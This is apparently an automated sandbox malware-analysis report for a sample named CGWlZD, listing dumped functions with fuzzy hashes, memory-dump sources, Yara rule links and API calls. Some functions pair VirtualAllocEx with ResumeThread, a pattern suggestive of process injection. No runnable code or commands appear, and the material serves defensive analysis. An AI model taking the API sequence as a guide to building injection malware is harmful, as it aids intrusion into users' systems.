API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 7c4a827c8c56350e655ff5d34bec728ce741b890407938b067eb53ef87c4ea97
Instruction ID: 82ad76a39e86e895910d6184bddb9488f3a83dc845d32836b518364c960977a4
Opcode Fuzzy Hash: 7c4a827c8c56350e655ff5d34bec728ce741b890407938b067eb53ef87c4ea97
Instruction Fuzzy Hash: 9A214771D103098FEB20DFAAC4847EEBBF4EF48314F54842AD519A7640C778A945CFA5

Function 0A375E90 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A375F06

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 95da34047488788ca3fb5fa94f7b7272b8c65850eebe3cb1743d18a06b7592c7
Instruction ID: c4099ace119d55e5d4353233fd8d939e2edc65a5744d73ad469b8aaf950fb67e
Opcode Fuzzy Hash: 95da34047488788ca3fb5fa94f7b7272b8c65850eebe3cb1743d18a06b7592c7
Instruction Fuzzy Hash: 22216A72800249CFDF20CFA9D844BEEBBF1EF48310F14841AE519A7250C7795951CF90

Function 0A521C74 Relevance: 1.6, APIs: 1, Instructions: 56
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0A522B0A,?,?,?,?,?), ref: 0A522BAF

Memory Dump Source

Source File: 0000000A.00000002.1427303086.000000000A520000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a520000_CGWlZD.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: c2a4a2f32d67023eecc538b31f78675adee3fcbb3822065324e74ef80bf381bb
Instruction ID: 0851f00cc3582aeb57fc004a707debf346e903b4048715761c0e88735ced9595
Opcode Fuzzy Hash: c2a4a2f32d67023eecc538b31f78675adee3fcbb3822065324e74ef80bf381bb
Instruction Fuzzy Hash: B91156B680024D9FDB10CF9AC844BDEBFF8FB48310F14841AE914A3250C379A950CFA4

Function 0A375D08 Relevance: 1.6, APIs: 1, Instructions: 54
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 0A375D72

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4775f295a9d8f24c4f2b69f92969a67b2094285c0403fd99366c7b0699aec2cb
Instruction ID: 97274d366b62d8c56ba6c0658c5f5cdf6876685e382a66df9fb00aed954dfb19
Opcode Fuzzy Hash: 4775f295a9d8f24c4f2b69f92969a67b2094285c0403fd99366c7b0699aec2cb
Instruction Fuzzy Hash: D31176B1C003498FEB20DFAAC4457EEFBF4EB48310F14882AD419A7240D7796941CBA5

Function 0A375E98 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A375F06

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3e742c9998127fb4c27aed630665e570b7d7318ce2e63ef06702612c71215d10
Instruction ID: de03654f9f43fae53a4daf04eb814b0521d6fb7d3b0767dba2177f00da3257a0
Opcode Fuzzy Hash: 3e742c9998127fb4c27aed630665e570b7d7318ce2e63ef06702612c71215d10
Instruction Fuzzy Hash: 381123768102099BDB20DFAAC844BDEBBF5EB48310F14881AE519A7250C779A954CFA5

Function 0A375D10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0A375D72

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e87b8e7445a97174931e35f01d05f2abec0a29b0cd0a6e65ae651ea028b38cf4
Instruction ID: ad6c679bf795a715e08ddec1efd76708e7cd20a52df0f86ce64c4847b2ec2062
Opcode Fuzzy Hash: e87b8e7445a97174931e35f01d05f2abec0a29b0cd0a6e65ae651ea028b38cf4
Instruction Fuzzy Hash: 0C1125B5D003498BEB24DFAAC44879EBBF4EB88214F14882AD519A7250C779A944CBA5

Function 0A376024 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0A3793DD

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 50ff40b437b50d45ae9f568fc651a7ba30cf47ff1063cef8a2c5caa00d22a79b
Instruction ID: 41a4d132e9b4bfb0406ede3854be9c3e54b0733efb2639a936d1f15154e35874
Opcode Fuzzy Hash: 50ff40b437b50d45ae9f568fc651a7ba30cf47ff1063cef8a2c5caa00d22a79b
Instruction Fuzzy Hash: BC1133B5800349DFDB20CF8AD485BDEBBF8EB48310F10841AE558A7740C378A944CFA4

Function 0A379378 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0A3793DD

Memory Dump Source

Source File: 0000000A.00000002.1427230141.000000000A370000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a370000_CGWlZD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 4a38be408b99e7d5ce04d9bde5c2815688f693af4919cc47a869371d92817306
Instruction ID: 789969288dd77607a67d0266a87dd5a3ff0103819fe21314f0afc49a3f595241
Opcode Fuzzy Hash: 4a38be408b99e7d5ce04d9bde5c2815688f693af4919cc47a869371d92817306
Instruction Fuzzy Hash: 381103B9800349DFDB20CF9AD585BDEBBF4EB48310F10841AE558A7750C3B9A944CFA5

Function 01543E68 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

_=!, xrefs: 01543F1C

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID: _=!
API String ID: 0-1823989621
Opcode ID: dd3ab92d4505629b2224b8805b5cda3d3acdaa07a3935b7fe186870f25ad43a5
Instruction ID: 9d957ef9ccf98a3bd84bfcaa79b0626f5e865eca21c1d97dfd741edd2224b71f
Opcode Fuzzy Hash: dd3ab92d4505629b2224b8805b5cda3d3acdaa07a3935b7fe186870f25ad43a5
Instruction Fuzzy Hash: DE314870E05219DFCB48CFA9C4805AEFBF2FF89304F1489AAC455AB224E3349A41CF54

Function 0154B8EB Relevance: .7, Instructions: 693COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f947d0fd55a83a3ecf04a25bffcb1126fcc7ac9f121575463a2f8a2d6536d506
Instruction ID: aa07d225a34114a6986a6e3f7db4c3d4dc77034eee0ef274c5eb9bb613891af3
Opcode Fuzzy Hash: f947d0fd55a83a3ecf04a25bffcb1126fcc7ac9f121575463a2f8a2d6536d506
Instruction Fuzzy Hash: A5723970A0121ADFDB1AEF65E854AADBBB1FF89300F01459AC44AAB354DF35AD44CF81

Function 0154B930 Relevance: .7, Instructions: 692COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2150583ca1b8499f35f4aedcef4ec8dec0b242519c0fbb19703022f2542db92b
Instruction ID: 951edee9b185c2e555f2e5b1cb03773ee9dbcb62adcd215e441b0373120d7007
Opcode Fuzzy Hash: 2150583ca1b8499f35f4aedcef4ec8dec0b242519c0fbb19703022f2542db92b
Instruction Fuzzy Hash: 0B724AB0A0121ADFDB1AEF65E854AAD77B1FF89300F0145AAC44AAB354DF35AD44CF81

Function 0154B940 Relevance: .7, Instructions: 688COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54748293c3697e1c7c5b501b08e4d3d7c5572f6db962db02105852ebe7fabea3
Instruction ID: 05f81ee907ca2dace22c871f527b7d83ee389987cab5770b272395ff0bd43a04
Opcode Fuzzy Hash: 54748293c3697e1c7c5b501b08e4d3d7c5572f6db962db02105852ebe7fabea3
Instruction Fuzzy Hash: 5D724970A0121ADFDB1AEF65E854AADB7B1FF89300F0145AAC44AAB354DF35AD44CF81

Function 01549C14 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8347f4376da43e919d666b68ee74cbdb78da4ddf343920c094ef079b62f7275
Instruction ID: bed3816e4cd6b992b0dbd74fdc48d4386752ad15ba8f27d6ab69053b8656a163
Opcode Fuzzy Hash: e8347f4376da43e919d666b68ee74cbdb78da4ddf343920c094ef079b62f7275
Instruction Fuzzy Hash: 8CA17470A10606CFCB14DF6CC88499DBBB1FF89314F1186A9E509AF366EB71E945CB90

Function 0154F9C0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8a958468f6866f87f8762ed801d724d3a44e27a6fb844c6a02f2f79aac07676
Instruction ID: 52bfb14f1acba3542a2d26e7afc059bfd345afecac78698b79e40e81e2d4cb58
Opcode Fuzzy Hash: f8a958468f6866f87f8762ed801d724d3a44e27a6fb844c6a02f2f79aac07676
Instruction Fuzzy Hash: 3D7163B0100B40CFD325DF25D844B5BBBF6FF88314F108A5DD05A8B6A1DBB5B9498B91

Function 0154D920 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322cf9272a0d7848dc50da9a481f7ca56f27d0be9605f0ee1dd13626cfa4ea2a
Instruction ID: 5336745be4940624ac52ce9f9f0227566b941a29b91c08579c4a8c3b7e0abbe7
Opcode Fuzzy Hash: 322cf9272a0d7848dc50da9a481f7ca56f27d0be9605f0ee1dd13626cfa4ea2a
Instruction Fuzzy Hash: 3B310F347081019FEB029FA9D5087BEBBF6FBA8349F00406AE105DB285DB74C845CBA1

Function 0154DB48 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3d6aac3232a60dfa1ce93ddd80809363a8b99b9cd2b5dfc69b86895ae7c3efa
Instruction ID: ec30af54dd34410434173b5f18ed41a0f938fb21be772847b6928712ada79660
Opcode Fuzzy Hash: d3d6aac3232a60dfa1ce93ddd80809363a8b99b9cd2b5dfc69b86895ae7c3efa
Instruction Fuzzy Hash: 70213B34700616CBEB15DBA9D5006BE77F9AB98348F148065C809CB345EB79DA069BC5

Function 014ED4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1414261529.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14ed000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a4ed4ee16b8ec88d61ea51c25adcf91a9aeddeb12f1a91cdf5c6a511842b23
Instruction ID: 5e329869c0d7f867b15f1f58feae7d2d0a5eb8708a986935c4f628d473596353
Opcode Fuzzy Hash: 11a4ed4ee16b8ec88d61ea51c25adcf91a9aeddeb12f1a91cdf5c6a511842b23
Instruction Fuzzy Hash: 672136B1900240DFDB05DF84D9C4B27BFA5FB88319F20856AD9050A266C336D856CBA2

Function 014FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1414853510.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14fd000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1d805fb26651d709520e836fa007baf7eeb794028f5d3534bd7996611d6912
Instruction ID: dfcd40323512f4ed299ac7e8718644d74e40c79401a46dcd2a54adc4ebff3bab
Opcode Fuzzy Hash: 8a1d805fb26651d709520e836fa007baf7eeb794028f5d3534bd7996611d6912
Instruction Fuzzy Hash: 992137B1904340DFDB15DF54D9C0B16BBA5EB84318F20C56EDA0A4B3A6C336D847CA62

Function 014FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1414853510.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14fd000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fecf125bc5b638249a1288a91e0a17919bb309e52fcb08cf40a76e8fa11d0cc6
Instruction ID: d038b91211ee08f67eec3a9a7fb40f5abe9708fe3a6e30ddbffc5169257e285a
Opcode Fuzzy Hash: fecf125bc5b638249a1288a91e0a17919bb309e52fcb08cf40a76e8fa11d0cc6
Instruction Fuzzy Hash: DC210779904344EFDB05DF54D9C0B26BBA5FB84324F20C56EDA094B3A2C736D846CAA2

Function 0154A630 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8bab0a72a2d4e8f92ed3713b56041b215e091809c14bb9e4f883743fcad880d
Instruction ID: aa4d75e820e7a35566996c75141b533541f9ae1a3f32862a78598c242f2bf7b6
Opcode Fuzzy Hash: c8bab0a72a2d4e8f92ed3713b56041b215e091809c14bb9e4f883743fcad880d
Instruction Fuzzy Hash: 3E217C716042028BDB45DF2CC840796F7E2FFD9328F15CABAD809DF395DA7498468B90

Function 01549B94 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bfc224234f583b6f5156bae575e0311cae75b43a145330c1131ef22d7e5946a
Instruction ID: 56298f5447214bc872166d5b40ab1ac43dd98f20314cfa35b365a380057226a6
Opcode Fuzzy Hash: 5bfc224234f583b6f5156bae575e0311cae75b43a145330c1131ef22d7e5946a
Instruction Fuzzy Hash: E1218B716002028BDB04DF2DC880786F7E6FFD9328B14CABAD809DF385DA74A8458B90

Function 0154DDF0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87321b7e90a747d63d0555d104007384a8df0e7c08b7dc1fb472c3e1da4394fd
Instruction ID: 7a1bad1ca4733914db0dcb43394391df580068668b183e4d419f08b20cd0f1a7
Opcode Fuzzy Hash: 87321b7e90a747d63d0555d104007384a8df0e7c08b7dc1fb472c3e1da4394fd
Instruction Fuzzy Hash: ED21AF307002068FEB25EB7AC90077E77F5FBA8704F544829D905DF284EA3AD81587A1

Function 01543AC9 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a57708b2940bd2c8bb9f2fd7101431763489c327997741cad3722d9ffcb58b6
Instruction ID: bb253c27f8b5f6453fb33b1ac8abf756b3c518f8d6f03a5665e384ae28880d07
Opcode Fuzzy Hash: 1a57708b2940bd2c8bb9f2fd7101431763489c327997741cad3722d9ffcb58b6
Instruction Fuzzy Hash: DB2139B0E01219DFDB44DFA9C545AAEFBF1FF89304F14C8AAC504AB265D7708A41DB50

Function 0154A7F0 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0661a088a8f3e3cba865ff72ffae31a104b97b5c1bff60572f8c33792bdcb082
Instruction ID: 032c20ec4ec4f920ddf63e56f865447eba1108927ceae69540366bcbe32276f2
Opcode Fuzzy Hash: 0661a088a8f3e3cba865ff72ffae31a104b97b5c1bff60572f8c33792bdcb082
Instruction Fuzzy Hash: 4221C631A007468BDB019F68C850396B3B1FFE9314F15867AD94D7B386EB716C85C7A0

Function 01549BE4 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc95516332fd6bf9a33296ac31abe8eceff7384d4b228bf8a1ce5591591adb73
Instruction ID: 49203213f2d59c72bde05a566f0b884ab3419b80091d714658890245deead0c2
Opcode Fuzzy Hash: fc95516332fd6bf9a33296ac31abe8eceff7384d4b228bf8a1ce5591591adb73
Instruction Fuzzy Hash: A7215131A107068BDB01AF68C850396B3B1FFE9318F118A7AD94D7B245DB71699587A0

Function 014FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1414853510.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14fd000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7368f95bf467f66e15de7ed60e1c9205595be09dbe742938c05de3cddd3b396e
Instruction ID: 265ef70b81fd5241f4f2c6ebde620ed8c33f74c28e72327f1891c01b33876d0f
Opcode Fuzzy Hash: 7368f95bf467f66e15de7ed60e1c9205595be09dbe742938c05de3cddd3b396e
Instruction Fuzzy Hash: AD217F755093808FCB06CF24D590716BF71EB46218F28C5EBD9498B7A7C33A984ACB62

Function 01543BC1 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1036ca55cae49a144ccd2ba06079bf24dbf84f58b0513c53562e4c76d55f1ffc
Instruction ID: 8076efd67a57413833dd8100c71e7d2e298572d38f0c3144ddba48fea92b3f90
Opcode Fuzzy Hash: 1036ca55cae49a144ccd2ba06079bf24dbf84f58b0513c53562e4c76d55f1ffc
Instruction Fuzzy Hash: 1C210874E05209EFDB48DFA9C594A9EBBF2FF89300F15C4AAD4189B364D6709A01DB40

Function 01543BD0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b3ce902a7adfc320ec5b60ad156dcc13d8b547d618befffc008003b8b33115
Instruction ID: d9f7e2507537995f99ed743d34eea77cdd45dcecd90e8b90ffd847258b84509d
Opcode Fuzzy Hash: a0b3ce902a7adfc320ec5b60ad156dcc13d8b547d618befffc008003b8b33115
Instruction Fuzzy Hash: 6B11E474E04218EFDB48DFAAD594A9EBBF2FF88200F15C4A9D4289B364D7309A01DB44

Function 014ED49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1414261529.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14ed000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction ID: 5598d9b24f598a3a274cf189c9ea0d31eb3ad818df59c5d8a1ff64a4ca81519a
Opcode Fuzzy Hash: 444f0129935146d93b0ba88a7054ad2ea0b31eff6fd14696fed86fe0ef54b177
Instruction Fuzzy Hash: 2E11B1B6904240CFDB16CF54D5C4B56BFB1FB84324F24C5AAD9090B667C336D456CBA2

Function 014FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1414853510.00000000014FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14fd000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a796e63cb759f2b5a785b18c00e1c38df81079df420df4383ba63ef2e6e952
Instruction ID: 46378053cb0332818580328eceda209f142f7229b75ce1b227dba173a44c6230
Opcode Fuzzy Hash: 01a796e63cb759f2b5a785b18c00e1c38df81079df420df4383ba63ef2e6e952
Instruction Fuzzy Hash: 4C11BE79904240DFCB02CF54C5C0B16BBA1FB84224F24C6AED9494B7A6C33AD44ACB92

Function 0154EFF0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7e7f4b74d91b4ef0a84dbc836a3989566f772ed770c60258ca66c28a801e795
Instruction ID: aafc3ea303ff242a4dc786dd2643077e50d729e76dc4eba7d534e36624308a73
Opcode Fuzzy Hash: a7e7f4b74d91b4ef0a84dbc836a3989566f772ed770c60258ca66c28a801e795
Instruction Fuzzy Hash: D501D871300304ABDF24DF29DC45F5E7BAAFBC8714F108529F60A8F1A0CAB5AD518790

Function 0154DCC0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd1704ad98cf84749ab1392fcca9c9d010fde9b8871204d64b5986a3c2ff95fc
Instruction ID: df40bbb41bdff0d899e773b1721617655e751a8bb893d5710cf5e25f098befd5
Opcode Fuzzy Hash: dd1704ad98cf84749ab1392fcca9c9d010fde9b8871204d64b5986a3c2ff95fc
Instruction Fuzzy Hash: 7E018470A0030AEBDB08EFB5D85076D7BF6FF88300F508569D9059B394EA769E058792

Function 0154A738 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04ac9fc6235e8d0319876aa42bafd819d4cb613ad6bb86779f7cdbd49f2d9d40
Instruction ID: 36411475e699070c10756f7ff8e21245b9f5e3bd4128a1153a22b796b759490d
Opcode Fuzzy Hash: 04ac9fc6235e8d0319876aa42bafd819d4cb613ad6bb86779f7cdbd49f2d9d40
Instruction Fuzzy Hash: 3801F4316043024BEB119F689891796B3A6FFE9328F10467AD90DAF3C6DB755C4587A0

Function 01549BB4 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b146d028e272d7bb2cd400a559941bcd2e07acd12bcef0e6164f0329ec1f36c4
Instruction ID: 71f566d7c6ce3415928e0c953e8fa50eb9017f902955e9d56b9f00dd8a674c12
Opcode Fuzzy Hash: b146d028e272d7bb2cd400a559941bcd2e07acd12bcef0e6164f0329ec1f36c4
Instruction Fuzzy Hash: 58F0A43120430247EB10AF6D8894746B3E6FFD8328F504679E90D6F385DA75684587A0

Function 0154DD70 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e52b7018c94905f09d48f5f278cd359f8301ddfcbebfc32390fcb1b71ceb59f
Instruction ID: 9805f693aa7370c939b7fdfa172cb1c657bc98f64e9e3f8bed21dd9515ebdbd4
Opcode Fuzzy Hash: 7e52b7018c94905f09d48f5f278cd359f8301ddfcbebfc32390fcb1b71ceb59f
Instruction Fuzzy Hash: A6F0F870A0424A9FDB45EFB8D40522E77FAFB98300F6045B9C809DB755EF399D418B92

Function 01540838 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1540000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ec8b723e68bf2ac8ef25c0abc282436dc80f98813f97b165022f434621457d
Instruction ID: 7416769ebe0dc88254575524352ab5f02d0e48917b4e7a6afabdd322e35c8655
Opcode Fuzzy Hash: 53ec8b723e68bf2ac8ef25c0abc282436dc80f98813f97b165022f434621457d
Instruction Fuzzy Hash: 4FE02C3140A7018FDB21CF24E814B6ABBB0FF03324B0A829EC00AC3023D7322820CB10

Function 01540848 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1416622590.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Joe Sandbox IDA Plugin

